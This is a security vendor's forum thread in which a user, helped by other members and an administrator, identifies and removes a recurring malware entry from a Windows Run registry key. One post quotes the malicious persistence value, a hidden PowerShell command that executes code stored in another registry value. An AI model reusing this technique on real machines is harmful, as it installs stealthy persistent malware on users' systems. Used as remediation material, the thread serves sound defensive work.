Carl S 1 Posted March 4, 2020 Posted March 4, 2020 This keeps showing up in one of our client machines in registry with the Registry scanner Detection engine 20939 (20200303) : Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8 \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run the ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this? Or what else should I do next?
itman 1,806 Posted March 4, 2020 Posted March 4, 2020 14 minutes ago, Carl S said: \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run Did you manually check what's in that registry key? Display a screen shot of what's in the key.
Carl S 1 Posted March 4, 2020 Author Posted March 4, 2020 10 minutes ago, itman said: Did you manually check what's in that registry key? Display a screen shot of what's in the key. When I search for that key I don't find it in regedit.
itman 1,806 Posted March 5, 2020 Posted March 5, 2020 Search for: HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run
Administrators Marcos 5,462 Posted March 5, 2020 Administrators Posted March 5, 2020 Please provide ESET Log Collector logs from the machine.
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 16 hours ago, itman said: Search for: HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run Duh, didn't catch that, I just cut and pasted. Thanks.
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 OK, found it by navigating to it. Could not get search to work. In the meantime, I have ESET client issues on that machine, probably due to my own fault.
itman 1,806 Posted March 5, 2020 Posted March 5, 2020 50 minutes ago, Carl S said: OK, found it by navigating to it. Could not get search to work. So was there anything present in that registry key?
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 The suspicious part seems to be: key: authHost value: rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 12 hours ago, Marcos said: Please provide ESET Log Collector logs from the machine. Working on this. I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent. Now up and running again, and will get the logs. (Ok, it's collecting right now) It's been years since I've submitted these type of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 13 hours ago, Marcos said: Please provide ESET Log Collector logs from the machine. Hmm. I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."
itman 1,806 Posted March 5, 2020 Posted March 5, 2020 (edited) 1 hour ago, Carl S said: The suspicious part seems to be: key: authHost value: rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr)) I would say it is malicious. To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it. Note that authhost.exe is a legit Win system process, but that is obviously what is not running here. Edited March 5, 2020 by itman
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 21 minutes ago, itman said: I would say it is malicious. To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it. Note that authhost.exe is a legit Win system process, but that is obviously what is not running here. Am I deleting the whole key / value pair or the value and leaving the key?
Carl S 1 Posted March 5, 2020 Author Posted March 5, 2020 14 hours ago, Marcos said: Please provide ESET Log Collector logs from the machine. Marcos, I re-ran the collector on a whim, and this time, it worked. I now have the zip file ready.
itman 1,806 Posted March 5, 2020 Posted March 5, 2020 (edited) 44 minutes ago, Carl S said: Am I deleting the whole key / value pair or the value and leaving the key? I believe what is shown in your reg. key is this: BTW - when I tried to enter the rundll.exe code as data, Eset immmediately detected it as the PowerShell malware detection you're receiving. Hence, it doesn't display in the screen shot. Anyway, you will be deleting "authHost" which BTW is not a registry key. It is a String value. Deleting authHost will also remove any data associated with it which is the malicious code. Edited March 5, 2020 by itman
itman 1,806 Posted March 5, 2020 Posted March 5, 2020 I suspect what the malware did was a registry Import or equivalent to get around Eset's detection of the malicious code. Carl S 1
itman 1,806 Posted March 6, 2020 Posted March 6, 2020 (edited) Also checkout this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E .This is what the PowerShell script was using. Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself. Edited March 6, 2020 by itman Carl S 1
Administrators Marcos 5,462 Posted March 6, 2020 Administrators Posted March 6, 2020 10 hours ago, Carl S said: Marcos, I re-ran the collector on a whim, and this time, it worked. I now have the zip file ready. You can upload it here, only ESET staff and the poster have access to attachments granted. Alternatively you can upload the archive to a safe location and drop me a personal message with a download link.
Carl S 1 Posted March 6, 2020 Author Posted March 6, 2020 14 hours ago, itman said: Also checkout this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E .This is what the PowerShell script was using. Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself. I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.
Carl S 1 Posted March 6, 2020 Author Posted March 6, 2020 Hi Marcos, here is attachment. I removed the value of the authHost line. But other than that, everything else is the same. FWIW, I have no new detections since the 4th. 10485-baker01-ees_logs.zip
itman 1,806 Posted March 6, 2020 Posted March 6, 2020 Just now, Carl S said: I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item. Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise. Carl S 1
Carl S 1 Posted March 6, 2020 Author Posted March 6, 2020 12 minutes ago, itman said: Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise. Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.
Administrators Marcos 5,462 Posted March 6, 2020 Administrators Posted March 6, 2020 Please delete the following registry values and then reboot the machine: HKU\S-1-5-21-3146671537-2346468688-2395455220-1182\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\authHos HKCU\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E\Auxibrkr
Recommended Posts